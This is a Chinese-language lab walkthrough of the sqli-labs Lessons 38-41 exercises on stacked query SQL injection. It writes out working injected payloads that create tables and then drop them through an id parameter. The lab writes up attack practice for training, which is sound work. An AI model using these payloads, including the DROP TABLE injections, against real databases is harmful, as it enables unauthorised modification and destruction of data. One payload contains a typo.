补充知识:堆叠注入




Lesson 38 GET – Stacked Query injection – string
(1)先测试
SELECT * FROM users WHERE id=‘1‘ LIMIT 0,1

显示正常,id值被单引号包裹
加上单引号和注释符
?id=1‘ –+

(2)构造语句
?id=1‘; create table crow2 like users; –+

执行成功
(3)在mysql命令行中查看

插入成功
(4)删除刚创建的表
?id=1‘; drop table crow2; –+

执行成功

已成功删除
Lesson 38结束
Lesson 39 GET – Stacked Query injection – Intiger based
(1)先测试
SELECT * FROM users WHERE id=1 LIMIT 0,1

显示正常,id值没有被包裹
(2)直接构造语句
?id=1; create table crow like users;–+

执行成功

(3)删除刚创建好的表
?id=1; drop table crow;–+

执行成功

成功删除
Lesson 39结束
Lesson 40 GET – Blind based – string – stacked
(1)先测试
SELECT * FROM users WHERE id=(‘1‘) LIMIT 0,1

显示正常,id值被单引号和括号包裹
加上单引号和单括号 注释符
?id=1‘) –+

(2)构造语句
?id=1‘); create table crow lie users; –+


创建成功
(3)删除表
?id=1‘); drop table crow; –+

执行成功

删除成功
Lesson 40结束
Lesson 41 GET – Blind based – Intiger – Stacked
(1)先测试
SELECT * FROM users WHERE id=1 LIMIT 0,1

显示正常,id值没有进行包裹
(2)加上单引号

没有任何回显
前几关,加上相应的会进行报错,所以证明这次的是盲注,只有输入正确的时候才会显示。不过不怎么影响接下来的操作。
(3)构造语句
?id=1; create table crow like users;–+


创建成功
(4)删除表
?id=1; drop table crow;–+


删除成功
Lesson 41结束